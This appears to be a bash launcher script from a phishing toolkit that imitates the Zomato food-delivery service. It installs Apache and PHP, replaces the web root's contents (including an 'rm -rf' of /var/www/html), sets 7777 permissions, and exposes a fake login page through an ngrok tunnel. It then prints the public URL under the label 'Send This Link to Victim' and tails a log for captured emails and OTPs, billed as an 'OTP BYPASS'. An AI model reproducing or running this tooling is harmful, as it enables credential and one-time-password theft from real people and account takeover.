Path: blob/master/sites/Zomato-Phishing/Zomato.sh
1507 views
#!/bin/bash12stop() {34checkngrok=$(ps aux | grep -o "ngrok" | head -n1)5if [[ $checkngrok == *'ngrok'* ]]; then6pkill -f -2 ngrok > /dev/null 2>&17killall -2 ngrok > /dev/null 2>&18fi9if [[ -e sendlink ]]; then10rm -rf sendlink11fi1213}1415sleep 216# spinner17spinlong ()18{19bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"20barlenght=${#bar}21i=o22while ((i < 100 )); do23n=$((i*barlenght / 100 ))24printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"25((i += RANDOM%5+2))26sleep 0.427done28}293031#clolors32white='\e[1;37m'33green='\e[0;32m'34blue='\e[1;34m'35red='\e[1;31m'36yellow='\e[1;33m'37383940echo""41echo""42clear43echo -e $yellow " ╦ ╦╔═╗╦ ╔═╗╔═╗╔╦╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╔╦╗╔═╗╔╦╗╔═╗ ╔═╗╦ ╦╦╔═╗╦ ╦╦╔╗╔╔═╗ "44echo -e $yellow " ║║║║╣ ║ ║ ║ ║║║║║╣ ║ ║ ║ ╔═╝║ ║║║║╠═╣ ║ ║ ║───╠═╝╠═╣║╚═╗╠═╣║║║║║ ╦ "45echo -e $yellow " ╚╩╝╚═╝╩═╝╚═╝╚═╝╩ ╩╚═╝ ╩ ╚═╝ ╚═╝╚═╝╩ ╩╩ ╩ ╩ ╚═╝ ╩ ╩ ╩╩╚═╝╩ ╩╩╝╚╝╚═╝ "46echo -e $white " +++++++++++++++++++++++++++ OTP BYPASS ++++++++++++++++++++++++++++++++++ "4748echo ""49echo ""50echo -e $'\e[1;32m[\e[0m\e[1;77m+\e[0m\e[1;32m]\e[0m\e[1;33m >> DOWNLOAD REQUIREMENTS >> \e[0m'51sleep 252echo""53sudo apt-get install apache254apt install php55apt install jq56apt install tail57apt install curl58systemctl start apache259apt install xterm60apt install gnome-terminal61systemctl restart apache2.service62mkdir /var63mkdir /var/www64mkdir /var/www/html65mv /var/www/html/* /var/www/66rm -rf /var/www/html/*67cp -R * /var/www/html/68cd ..69clear70cd /var/www/html/71chmod +x *72chmod 7777 *73sleep 374clear75./ngrok http 80 > /dev/null &7677echo ""78echo -e $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;92m >> WAIT FOR NGROK UP !\e[0m'79sleep 2580echo ""81clear82./Logo.sh83echo ""84echo -e $yellow "// [ Send This Link to Victim ] //"85echo ""86echo -e $white87curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url88curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url89echo ""90echo ""91echo -e $green "// [ CREDENTIAL ] //"92echo ""93tail -f log.txt | grep -e "email" -e "otp" -e "OTP"94959697;;9899100101